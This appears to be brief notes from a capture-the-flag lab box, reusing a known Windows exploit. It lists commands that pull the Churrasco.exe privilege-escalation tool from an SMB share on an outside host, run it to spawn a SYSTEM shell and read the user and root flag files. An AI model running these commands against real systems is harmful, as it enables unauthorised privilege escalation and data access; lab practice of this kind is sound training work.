same cve from granny worked…

net use \\10.10.14.2\pub

cd C:\WINDOWS\Temp copy \\10.10.14.2\pub\Churrasco.exe .

cd C:\WINDOWS\Temp

Churrasco.exe cmd.exe cd "c:\Documents and Settings"

type Harry\Desktop\user.txt

type Administrator\Desktop\root.txt